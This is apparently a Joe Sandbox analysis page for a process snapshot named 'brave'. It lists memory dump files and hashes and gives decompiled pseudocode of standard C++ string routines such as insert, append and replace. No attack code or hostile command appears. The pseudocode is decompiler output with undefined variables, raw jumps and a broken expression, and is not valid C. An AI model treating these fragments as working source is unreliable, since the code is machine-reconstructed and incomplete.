Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID: basic_string::_M_construct null not valid
API String ID: 0-3522614731
Opcode ID: 14aa54d20c428766249a2dcfb27d26650a5f1dce7f3d40a69184aa0789750512
Instruction ID: 7a96b6218db3c467f67a30a36ddb18128cdd9a16c887c4aa97312dbc87b2ce4b
Opcode Fuzzy Hash: 14aa54d20c428766249a2dcfb27d26650a5f1dce7f3d40a69184aa0789750512
Instruction Fuzzy Hash: 5F51C062A09E5180EA38BB16E4001B9F7A0AB59FF4F984432DE9D07765DF7CD64AC314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BB8FA0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BB8FA0(long long* __rcx, intOrPtr* __rdx, long long __r8, void* __r9) {
				void* _t3;
				long long* _t7;

				_t7 = __rcx;
				_t9 =  *__rdx;
				_t16 =  *((intOrPtr*)( *__rdx - 0x18));
				if (__r8 -  *((intOrPtr*)( *__rdx - 0x18)) > 0) goto 0x15bb8fd2;
				r9d = 0;
				_t3 = E00007FF77FF715BB6C20(__r8, _t9 + __r8, _t9 + _t16);
				 *_t7 = __r8;
				return _t3;
			}

0x7ff715bb8fa5
0x7ff715bb8fa8
0x7ff715bb8fb1
0x7ff715bb8fbc
0x7ff715bb8fc1
0x7ff715bb8fc4
0x7ff715bb8fc9
0x7ff715bb8fd1

Strings

basic_string::basic_string, xrefs: 00007FF715BB8FD5, 00007FF715BB9033, 00007FF715BB9093
basic_string::_S_construct null not valid, xrefs: 00007FF715BB912A
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF715BB8FDC, 00007FF715BB903A, 00007FF715BB909A

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
API String ID: 0-1533248280
Opcode ID: 7d89f8512e7e65814ec1fac360f2fa8d0805d6f994624814b77e8e40921412a7
Instruction ID: fe563b2e7b554c173e41f8a09ea1bcc82264622cd5fb35c103fe7ab1a13fdd4c
Opcode Fuzzy Hash: 7d89f8512e7e65814ec1fac360f2fa8d0805d6f994624814b77e8e40921412a7
Instruction Fuzzy Hash: 444125A1F06E4581FF38BB61E4543B9A2A1AB65FE4F844031DE0C0B3A1EF6CD649C354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BB8980 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BB8980(long long* __rcx, intOrPtr* __rdx, long long __r8, void* __r9) {
				void* _t3;
				long long* _t7;

				_t7 = __rcx;
				_t9 =  *__rdx;
				_t16 =  *((intOrPtr*)( *__rdx - 0x18));
				if (__r8 -  *((intOrPtr*)( *__rdx - 0x18)) > 0) goto 0x15bb89b2;
				r9d = 0;
				_t3 = E00007FF77FF715BB6C20(__r8, _t9 + __r8, _t9 + _t16);
				 *_t7 = __r8;
				return _t3;
			}

0x7ff715bb8985
0x7ff715bb8988
0x7ff715bb8991
0x7ff715bb899c
0x7ff715bb89a1
0x7ff715bb89a4
0x7ff715bb89a9
0x7ff715bb89b1

Strings

basic_string::basic_string, xrefs: 00007FF715BB89B5, 00007FF715BB8A13, 00007FF715BB8A73
basic_string::_S_construct null not valid, xrefs: 00007FF715BB8B0A
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF715BB89BC, 00007FF715BB8A1A, 00007FF715BB8A7A

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
API String ID: 0-1533248280
Opcode ID: 7d8338a1e9edd29d1aec0803ef2ebf7c98187b021472197f0bb09db241f85474
Instruction ID: 267de8ec5bf7bdd03fa44a2a9820a5e66b89745bdd9dff65ea3f867641a7f20c
Opcode Fuzzy Hash: 7d8338a1e9edd29d1aec0803ef2ebf7c98187b021472197f0bb09db241f85474
Instruction Fuzzy Hash: 634114A2F16E4581EF38AB61E4543BDA390AB64FE4F844431DE0C0B3A6DF6CD689C354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BBC170 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 161
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF77FF715BBC170(intOrPtr* __rcx, void* __rdx, intOrPtr* __r8) {
				long long _v24;
				void* _t5;
				void* _t6;

				if (__rdx -  *__rcx -  *((intOrPtr*)(__rcx + 8)) > 0) goto 0x15bbc19a;
				_v24 =  *((intOrPtr*)(__r8 + 8));
				r8d = 0;
				return E00007FF77FF715BBAE20(_t5, _t6, __rcx, __rdx -  *__rcx,  *((intOrPtr*)(__r8 + 8)),  *__r8);
			}

0x7ff715bbc185
0x7ff715bbc187
0x7ff715bbc18c
0x7ff715bbc199

APIs

strlen.MSVCRT ref: 00007FF715BBC1D5

Part of subcall function 00007FF715BBAE20: memcpy.MSVCRT ref: 00007FF715BBAEC5
Part of subcall function 00007FF715BBAE20: memcpy.MSVCRT ref: 00007FF715BBAEF0

Strings

basic_string::replace, xrefs: 00007FF715BBC1A0, 00007FF715BBC206, 00007FF715BBC248, 00007FF715BBC28C, 00007FF715BBC307
basic_string::insert, xrefs: 00007FF715BBC2EE, 00007FF715BBC34C
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF715BBC1A7, 00007FF715BBC20D, 00007FF715BBC24F, 00007FF715BBC293, 00007FF715BBC2F5, 00007FF715BBC30E, 00007FF715BBC353

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpy$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace
API String ID: 2619041689-3628603605
Opcode ID: acf8db3c17e877630cf77c62e067198b43ffa339475565046a16a17aaf7fc19b
Instruction ID: 31b98ca8026a8ba4ff04b657760a99648e2f5f6c7f165116103dc1c71801b63f
Opcode Fuzzy Hash: acf8db3c17e877630cf77c62e067198b43ffa339475565046a16a17aaf7fc19b
Instruction Fuzzy Hash: 9541D061E05E8681EA28FB65D8014AAA360EB55FE4BC04037DD0D6BB31EF6CD64DC718

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BBF340 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF77FF715BBF340(intOrPtr* __rcx, void* __rdx, intOrPtr* __r8) {
				long long _v24;
				void* _t5;
				void* _t6;

				if (__rdx -  *__rcx >> 1 -  *((intOrPtr*)(__rcx + 8)) > 0) goto 0x15bbf36d;
				_v24 =  *((intOrPtr*)(__r8 + 8));
				r8d = 0;
				return E00007FF77FF715BBDEF0(_t5, _t6, __rcx, __rdx -  *__rcx >> 1,  *((intOrPtr*)(__r8 + 8)),  *__r8);
			}

0x7ff715bbf358
0x7ff715bbf35a
0x7ff715bbf35f
0x7ff715bbf36c

APIs

wcslen.MSVCRT ref: 00007FF715BBF3A5

Part of subcall function 00007FF715BBDEF0: memcpy.MSVCRT ref: 00007FF715BBDF96
Part of subcall function 00007FF715BBDEF0: memcpy.MSVCRT ref: 00007FF715BBDFC1

Strings

basic_string::replace, xrefs: 00007FF715BBF373, 00007FF715BBF3D6, 00007FF715BBF418, 00007FF715BBF45C, 00007FF715BBF4D5
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF715BBF37A, 00007FF715BBF3DD, 00007FF715BBF41F, 00007FF715BBF463, 00007FF715BBF4C3, 00007FF715BBF4DC, 00007FF715BBF523
basic_string::insert, xrefs: 00007FF715BBF4BC, 00007FF715BBF51C

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpy$wcslen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace
API String ID: 1844840824-3628603605
Opcode ID: 7f7506947e0cdf472993f0743dd8d0f22e204ef2ca206140b47516d04f83e820
Instruction ID: d6878c76f21beaf9aa2c3ec869a9fefd5af69f5567cac9069fbc9113dd3e8f9a
Opcode Fuzzy Hash: 7f7506947e0cdf472993f0743dd8d0f22e204ef2ca206140b47516d04f83e820
Instruction Fuzzy Hash: DE41E362E19D8680EA28BB69D8404AEE360FB59FE4BC04036DD4D5B771EF6CD28DC314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BBEEA0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF715BBEF05
memcpy.MSVCRT ref: 00007FF715BBEFDA

Strings

basic_string::append, xrefs: 00007FF715BBEF5D, 00007FF715BBF039
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF715BBEF64

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
API String ID: 3510742995-4063909124
Opcode ID: fe7fef964f37f1dd9b1a180919c66d0ec6042240d860377790e12c591085c9ce
Instruction ID: 196adfca8141afb9f9b547c3d9d610e9201d2f356c2ba71f28cd4249bac28ef3
Opcode Fuzzy Hash: fe7fef964f37f1dd9b1a180919c66d0ec6042240d860377790e12c591085c9ce
Instruction Fuzzy Hash: 2941B062A15E5584EA34EF29C4044BDA360EB49FE4BD44132EE5E473B1DF7DE249C318

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BBBCF0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF715BBBD55
memcpy.MSVCRT ref: 00007FF715BBBE27

Strings

basic_string::append, xrefs: 00007FF715BBBDB2, 00007FF715BBBE7C
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF715BBBDB9

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
API String ID: 3510742995-4063909124
Opcode ID: 9553ad4b2fb8957eda4529e061e9a93a6dd067d7bb1be6d681d056781aa60a57
Instruction ID: b96a6eb5b81c6c1d04414567957e56e3e5586fa611d1e179e4d6684ad4eed7d5
Opcode Fuzzy Hash: 9553ad4b2fb8957eda4529e061e9a93a6dd067d7bb1be6d681d056781aa60a57
Instruction Fuzzy Hash: C541E0A3A08A8A86DA38EB19C845579A360FB55FE0FD44432DE5D473B2DF6DD248C314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BB7CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BB7CE0(intOrPtr* __r8, void* __r9, intOrPtr _a40) {
				void* _t8;
				void* _t22;
				intOrPtr* _t25;
				char* _t27;
				int _t28;
				int _t30;
				intOrPtr _t40;
				void* _t47;
				intOrPtr _t49;

				_t40 =  *((intOrPtr*)( *__r8 - 0x18));
				_t47 =  >  ? _a40 : _t40 - __r9;
				if (__r9 - _t40 > 0) goto 0x15bb7d12;
				goto 0x15bb7b40;
				_t27 = "basic_string::insert";
				_t25 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
				E00007FF77FF715BC1250(_t8, __r9 - _t40, __r9, _t25, _t27, __r9,  *__r8 + __r9);
				_t49 =  *((intOrPtr*)( *_t25 - 0x18));
				if (_t27 - _t49 > 0) goto 0x15bb7db0;
				if (__r9 - 0xfffffff9 - _t49 > 0) goto 0x15bb7dc6;
				r8d = 0;
				E00007FF77FF715BB8580(_t25, _t27, __r9, __r9);
				if (__r9 == 0) goto 0x15bb7d8c;
				if (__r9 == 1) goto 0x15bb7da0;
				return memset(_t22, _t30, _t28);
			}

0x7ff715bb7cec
0x7ff715bb7cfc
0x7ff715bb7d03
0x7ff715bb7d0d
0x7ff715bb7d15
0x7ff715bb7d1f
0x7ff715bb7d26
0x7ff715bb7d3f
0x7ff715bb7d4f
0x7ff715bb7d61
0x7ff715bb7d66
0x7ff715bb7d69
0x7ff715bb7d71
0x7ff715bb7d7e
0x7ff715bb7d98

APIs

memset.MSVCRT ref: 00007FF715BB7D87

Strings

basic_string::insert, xrefs: 00007FF715BB7D15, 00007FF715BB7DBA
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF715BB7D1F, 00007FF715BB7DB3
basic_string::_M_replace_aux, xrefs: 00007FF715BB7DC6

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memset
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
API String ID: 2221118986-1339558951
Opcode ID: 76e07345fcce7906114913821502996534838701bb96e1ead79225c16b90c7dc
Instruction ID: 6532322fe9792c4eede517482d1456c28305463290de6ae951acaf1e633bf5ff
Opcode Fuzzy Hash: 76e07345fcce7906114913821502996534838701bb96e1ead79225c16b90c7dc
Instruction Fuzzy Hash: BA310566F15E4541EA38BB26A8414E9A350AB49FF0FC84532DF1C077B1EE7CE689C314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BC0C80 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF715BC0C92
memcpy.MSVCRT ref: 00007FF715BC0CE4
memcpy.MSVCRT ref: 00007FF715BC0D94

Strings

basic_string::append, xrefs: 00007FF715BC0D3A

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpy$wcslen
String ID: basic_string::append
API String ID: 1844840824-3811946249
Opcode ID: 148ea95ba2453b8e9f4c57894deee56eaa111a687ced5c9b40be94197a186ef0
Instruction ID: ca91933023893ba50dec50928179e61fb93b5e3fe2c6040bea035b64b44796a0
Opcode Fuzzy Hash: 148ea95ba2453b8e9f4c57894deee56eaa111a687ced5c9b40be94197a186ef0
Instruction Fuzzy Hash: 1C31BD66A29E4980DA38EB15C0095BEA361FB46FE4BD48532DE2D473A0DF38E549C318

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BC18C0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

malloc.MSVCRT(?,?,FFFFFFFF,00007FF715BB7139,?,?,FFFFFFFF,00007FF715BB6BB5,?,00000000,basic_string::_M_create,00007FF715BBA151), ref: 00007FF715BC18D4

Part of subcall function 00007FF715BC19A0: malloc.MSVCRT(?,?,?,?,00007FF715BC23B5,?,?,?,?,00007FF715B93C24), ref: 00007FF715BC19B1

malloc.MSVCRT(?,?,?,?,?,?,?,00007FF715BB7139,?,?,FFFFFFFF,00007FF715BB6BB5,?,00000000,basic_string::_M_create,00007FF715BBA151), ref: 00007FF715BC193A

Strings

basic_string::_M_create, xrefs: 00007FF715BC19A0

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: malloc
String ID: basic_string::_M_create
API String ID: 2803490479-3122258987
Opcode ID: 4b7b9b0c657b2bedbbe5b7b4e114ee3aa089cd27d8a34a41591c0c705e869eea
Instruction ID: 97441fb46eafd2cafcb17e3e085bba3c45fd92feac48e6c2602961f0d4a8a19d
Opcode Fuzzy Hash: 4b7b9b0c657b2bedbbe5b7b4e114ee3aa089cd27d8a34a41591c0c705e869eea
Instruction Fuzzy Hash: 8F21A321B26F4545EA7CB764A5123B8A290AF48FB0FD44634CE2D563D2DF3C6149C324

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BBDC10 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 102stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF715BBDC22
memcpy.MSVCRT ref: 00007FF715BBDC72
memcpy.MSVCRT ref: 00007FF715BBDD21

Strings

basic_string::append, xrefs: 00007FF715BBDCCD

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpy$strlen
String ID: basic_string::append
API String ID: 2619041689-3811946249
Opcode ID: 053ff8a127323fabc25172c75465cfa7311902f130f2a5a7fc06635915c12a55
